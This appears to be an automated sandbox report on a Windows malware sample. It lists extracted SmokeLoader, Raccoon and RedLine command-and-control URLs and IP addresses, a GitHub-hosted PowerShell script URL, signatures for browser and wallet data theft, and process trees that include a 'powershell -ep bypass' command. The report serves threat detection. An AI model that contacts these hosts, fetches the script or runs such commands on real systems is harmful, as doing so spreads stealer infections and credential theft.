Analysis
-
max time kernel
151s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
12-10-2021 12:23
Static task
static1
Behavioral task
behavioral1
Sample
66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe
Resource
win10-en-20210920
General
-
Target
66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe
-
Size
175KB
-
MD5
b6ccbe38498d3243118d076fe793989e
-
SHA1
d52cccb6054172e93c752de847eb15ca30545068
-
SHA256
66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17
-
SHA512
6b6f89a2245e64385ca5612f592460c1e66b03a708d98f8dc08f7034167e1141c29d4b843e5fbfbc5e437b112d1e30797dfe8c504fc5ef8fafe71cb6f5a01139
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
Extracted
raccoon
1.8.2
8d179b9e611eee525425544ee8c6d77360ab7cd9
-
url4cnc
http://teletop.top/agrybirdsgamerept
http://teleta.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
redline
159
190.2.136.29:3279
Extracted
raccoon
1.8.2
27d80aa27e80cd2ef63c638e2752e24242d1b37c
-
url4cnc
http://telemirror.top/ararius809b
http://tgmirror.top/ararius809b
http://telegatt.top/ararius809b
http://telegka.top/ararius809b
http://telegin.top/ararius809b
https://t.me/ararius809b
Extracted
redline
w1
109.234.34.165:12323
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1008-136-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/1008-145-0x000000000041B222-mapping.dmp family_redline behavioral1/memory/1852-163-0x0000000002430000-0x0000000002461000-memory.dmp family_redline behavioral1/memory/1852-168-0x0000000002860000-0x000000000287C000-memory.dmp family_redline behavioral1/memory/5068-239-0x000000000041B25E-mapping.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 77 2816 powershell.exe 80 2816 powershell.exe 81 2816 powershell.exe 82 2816 powershell.exe 84 2816 powershell.exe 86 2816 powershell.exe 88 2816 powershell.exe 90 2816 powershell.exe 92 2816 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
F34A.exeFDCA.exeD3D.exe1358.exe19B2.exe29E0.exe2FFB.exe2FFB.exepid process 772 F34A.exe 4292 FDCA.exe 3156 D3D.exe 376 1358.exe 1852 19B2.exe 4276 29E0.exe 4444 2FFB.exe 5068 2FFB.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\D3D.exe vmprotect C:\Users\Admin\AppData\Local\Temp\D3D.exe vmprotect behavioral1/memory/3156-132-0x00000000001E0000-0x0000000001026000-memory.dmp vmprotect -
Deletes itself 1 IoCs
Processes:
pid process 3048 -
Loads dropped DLL 2 IoCs
Processes:
pid process 2728 2728 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exeF34A.exe2FFB.exedescription pid process target process PID 3704 set thread context of 4364 3704 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe PID 772 set thread context of 1008 772 F34A.exe RegSvcs.exe PID 4444 set thread context of 5068 4444 2FFB.exe 2FFB.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 24 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9421.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mb14qyld.blg.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9400.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9410.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI93EF.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9422.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_m3yrepvk.fie.psm1 powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 84 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 80 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 81 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 82 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exepid process 4364 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 4364 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3048 -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid process 624 624 624 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exepid process 4364 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
RegSvcs.exepowershell.exe19B2.exepowershell.exepowershell.exepowershell.exe2FFB.exedescription pid process Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 1008 RegSvcs.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 1852 19B2.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeDebugPrivilege 952 powershell.exe Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeShutdownPrivilege 3048 Token: SeCreatePagefilePrivilege 3048 Token: SeIncreaseQuotaPrivilege 952 powershell.exe Token: SeSecurityPrivilege 952 powershell.exe Token: SeTakeOwnershipPrivilege 952 powershell.exe Token: SeLoadDriverPrivilege 952 powershell.exe Token: SeSystemProfilePrivilege 952 powershell.exe Token: SeSystemtimePrivilege 952 powershell.exe Token: SeProfSingleProcessPrivilege 952 powershell.exe Token: SeIncBasePriorityPrivilege 952 powershell.exe Token: SeCreatePagefilePrivilege 952 powershell.exe Token: SeBackupPrivilege 952 powershell.exe Token: SeRestorePrivilege 952 powershell.exe Token: SeShutdownPrivilege 952 powershell.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeSystemEnvironmentPrivilege 952 powershell.exe Token: SeRemoteShutdownPrivilege 952 powershell.exe Token: SeUndockPrivilege 952 powershell.exe Token: SeManageVolumePrivilege 952 powershell.exe Token: 33 952 powershell.exe Token: 34 952 powershell.exe Token: 35 952 powershell.exe Token: 36 952 powershell.exe Token: SeDebugPrivilege 2504 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 5068 2FFB.exe Token: SeIncreaseQuotaPrivilege 2508 powershell.exe Token: SeSecurityPrivilege 2508 powershell.exe Token: SeTakeOwnershipPrivilege 2508 powershell.exe Token: SeLoadDriverPrivilege 2508 powershell.exe Token: SeSystemProfilePrivilege 2508 powershell.exe Token: SeSystemtimePrivilege 2508 powershell.exe Token: SeProfSingleProcessPrivilege 2508 powershell.exe Token: SeIncBasePriorityPrivilege 2508 powershell.exe Token: SeCreatePagefilePrivilege 2508 powershell.exe Token: SeBackupPrivilege 2508 powershell.exe Token: SeRestorePrivilege 2508 powershell.exe Token: SeShutdownPrivilege 2508 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
pid process 3048 3048 3048 3048 3048 -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
pid process 3048 3048 3048 3048 3048 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exeF34A.exeD3D.exe2FFB.exepowershell.execsc.exe29E0.exepowershell.execsc.exedescription pid process target process PID 3704 wrote to memory of 4364 3704 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe PID 3704 wrote to memory of 4364 3704 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe PID 3704 wrote to memory of 4364 3704 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe PID 3704 wrote to memory of 4364 3704 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe PID 3704 wrote to memory of 4364 3704 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe PID 3704 wrote to memory of 4364 3704 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe 66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe PID 3048 wrote to memory of 772 3048 F34A.exe PID 3048 wrote to memory of 772 3048 F34A.exe PID 3048 wrote to memory of 772 3048 F34A.exe PID 3048 wrote to memory of 4292 3048 FDCA.exe PID 3048 wrote to memory of 4292 3048 FDCA.exe PID 3048 wrote to memory of 4292 3048 FDCA.exe PID 3048 wrote to memory of 3156 3048 D3D.exe PID 3048 wrote to memory of 3156 3048 D3D.exe PID 772 wrote to memory of 1008 772 F34A.exe RegSvcs.exe PID 772 wrote to memory of 1008 772 F34A.exe RegSvcs.exe PID 772 wrote to memory of 1008 772 F34A.exe RegSvcs.exe PID 772 wrote to memory of 1008 772 F34A.exe RegSvcs.exe PID 3048 wrote to memory of 376 3048 1358.exe PID 3048 wrote to memory of 376 3048 1358.exe PID 3048 wrote to memory of 376 3048 1358.exe PID 772 wrote to memory of 1008 772 F34A.exe RegSvcs.exe PID 3048 wrote to memory of 1852 3048 19B2.exe PID 3048 wrote to memory of 1852 3048 19B2.exe PID 3048 wrote to memory of 1852 3048 19B2.exe PID 3048 wrote to memory of 4276 3048 29E0.exe PID 3048 wrote to memory of 4276 3048 29E0.exe PID 3048 wrote to memory of 4276 3048 29E0.exe PID 3048 wrote to memory of 4444 3048 2FFB.exe PID 3048 wrote to memory of 4444 3048 2FFB.exe PID 3048 wrote to memory of 4444 3048 2FFB.exe PID 3156 wrote to memory of 4972 3156 D3D.exe powershell.exe PID 3156 wrote to memory of 4972 3156 D3D.exe powershell.exe PID 4444 wrote to memory of 5068 4444 2FFB.exe 2FFB.exe PID 4444 wrote to memory of 5068 4444 2FFB.exe 2FFB.exe PID 4444 wrote to memory of 5068 4444 2FFB.exe 2FFB.exe PID 4972 wrote to memory of 2820 4972 powershell.exe csc.exe PID 4972 wrote to memory of 2820 4972 powershell.exe csc.exe PID 2820 wrote to memory of 3412 2820 csc.exe cvtres.exe PID 2820 wrote to memory of 3412 2820 csc.exe cvtres.exe PID 4444 wrote to memory of 5068 4444 2FFB.exe 2FFB.exe PID 4444 wrote to memory of 5068 4444 2FFB.exe 2FFB.exe PID 4444 wrote to memory of 5068 4444 2FFB.exe 2FFB.exe PID 4444 wrote to memory of 5068 4444 2FFB.exe 2FFB.exe PID 4444 wrote to memory of 5068 4444 2FFB.exe 2FFB.exe PID 4972 wrote to memory of 952 4972 powershell.exe powershell.exe PID 4972 wrote to memory of 952 4972 powershell.exe powershell.exe PID 4276 wrote to memory of 2504 4276 29E0.exe powershell.exe PID 4276 wrote to memory of 2504 4276 29E0.exe powershell.exe PID 4276 wrote to memory of 2504 4276 29E0.exe powershell.exe PID 4972 wrote to memory of 2508 4972 powershell.exe powershell.exe PID 4972 wrote to memory of 2508 4972 powershell.exe powershell.exe PID 4972 wrote to memory of 1048 4972 powershell.exe powershell.exe PID 4972 wrote to memory of 1048 4972 powershell.exe powershell.exe PID 2504 wrote to memory of 2728 2504 powershell.exe csc.exe PID 2504 wrote to memory of 2728 2504 powershell.exe csc.exe PID 2504 wrote to memory of 2728 2504 powershell.exe csc.exe PID 2728 wrote to memory of 520 2728 csc.exe cvtres.exe PID 2728 wrote to memory of 520 2728 csc.exe cvtres.exe PID 2728 wrote to memory of 520 2728 csc.exe cvtres.exe PID 2504 wrote to memory of 3200 2504 powershell.exe powershell.exe PID 2504 wrote to memory of 3200 2504 powershell.exe powershell.exe PID 2504 wrote to memory of 3200 2504 powershell.exe powershell.exe PID 4972 wrote to memory of 2072 4972 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe"C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe"C:\Users\Admin\AppData\Local\Temp\66bdc8f55993937a58a2e14c593f803029910ac8533e994bdcd766f095d2fc17.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4364
-
-
C:\Users\Admin\AppData\Local\Temp\F34A.exeC:\Users\Admin\AppData\Local\Temp\F34A.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
C:\Users\Admin\AppData\Local\Temp\FDCA.exeC:\Users\Admin\AppData\Local\Temp\FDCA.exe1⤵
- Executes dropped EXE
PID:4292
-
C:\Users\Admin\AppData\Local\Temp\D3D.exeC:\Users\Admin\AppData\Local\Temp\D3D.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mvqhkszm\mvqhkszm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES391D.tmp" "c:\Users\Admin\AppData\Local\Temp\mvqhkszm\CSCD76DBC5193664ECEA183C9CC9464DAA6.TMP"4⤵PID:3412
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
